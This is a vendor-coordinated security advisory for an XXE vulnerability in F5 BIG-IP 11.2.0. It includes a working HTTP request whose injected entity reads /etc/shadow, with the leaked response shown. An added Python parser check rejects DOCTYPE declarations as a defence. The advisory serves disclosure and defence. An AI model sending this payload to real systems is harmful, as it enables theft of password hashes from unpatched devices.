F5 BIG-IP 11.2.0 XML External Entity Injection

2013.01.23
Credit: S. Viehböck
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >
=======================================================================
              title: XML External Entity Injection (XXE)
            product: F5 BIG-IP
 vulnerable version: <=11.2.0
      fixed version: 11.2.0 HF3
                     11.2.1 HF3
         CVE number: CVE-2012-2997
             impact: Medium
           homepage: http://www.f5.com/
              found: 2012-09-03
                 by: S. Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services
that work together on the same best-in-class hardware platform or
software virtual instance. From load balancing and service offloading to
acceleration and security, the BIG-IP system delivers agility and ensures
your applications are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:
-----------------------------------
An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP
component. This enables an authenticated attacker to download arbitrary
files from the file system with the rights of the "apache" OS user.
The BIG-IP configuration even allows access to the critical /etc/shadow
file which contains the password hashes of users.

Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file
system:

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
...

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version
11.2.0. No modules have to be enabled for successful exploitation.

Vendor contact timeline:
------------------------
2012-09-07: Contacting vendor - requesting PGP/SMIME key.
2012-09-07: Vendor provides case number and PGP key.
2012-09-11: Sending advisory draft and proof of concept.
2012-09-20: Vendor has a fix for the vulnerability - will be released
            "with different hot fixes for different releases".
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3
            and 11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.

Patch information is also available at:
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF S. Viehböck / @2013

References:

https://www.sec-consult.com
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html
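
Added example (not code from the advisory, SEC Consult or F5): a Python sketch of the parser-side control that stops the request shape shown in the proof of concept, by refusing any DOCTYPE before an entity can be declared. The function names, the flat <message> reader and the sample bodies are assumptions made for illustration; the page does not show how the hotfix changes server.php.

```python
import xml.parsers.expat

class ForbiddenXML(ValueError):
    """The message carried a DOCTYPE, so it could declare entities."""

def parse_message(body: bytes) -> dict:
    """Read the direct children of <message>; refuse any DOCTYPE."""
    fields, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Raised as soon as the DOCTYPE is seen, so the <!ENTITY ...>
        # declaration in the internal subset is never acted on.
        raise ForbiddenXML(f"DOCTYPE {name!r} rejected")

    def on_start(tag, attrs):
        stack.append(tag)
        text.clear()

    def on_end(tag):
        if len(stack) == 2:  # direct child of the root element
            fields[tag] = "".join(text)
        stack.pop()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields

def verdict(body: bytes) -> str:
    """Classify a request body the way a gateway or handler could log it."""
    try:
        parse_message(body)
        return "accepted"
    except ForbiddenXML as exc:
        return f"rejected: {exc}"
    except xml.parsers.expat.ExpatError:
        return "malformed"

# Constructed samples; the entity target is a placeholder path.
HEAD = b"<?xml version=\"1.0\" encoding='utf-8' ?>\n"
BENIGN = HEAD + b"<message><dialogueType>any</dialogueType></message>"
XXE_SHAPED = (HEAD + b"<!DOCTYPE a [<!ENTITY e SYSTEM '/placeholder/file'> ]>\n"
              b"<message><dialogueType>&e;</dialogueType></message>")
UNDECLARED = HEAD + b"<message><dialogueType>&e;</dialogueType></message>"

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("xxe", XXE_SHAPED), ("undeclared", UNDECLARED)]:
        print(name, "->", verdict(body))
```

A "rejected" verdict on POST bodies sent to the endpoint named in the proof of concept is also a useful detection signal, since the legitimate message format shown there has no need for a DOCTYPE.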

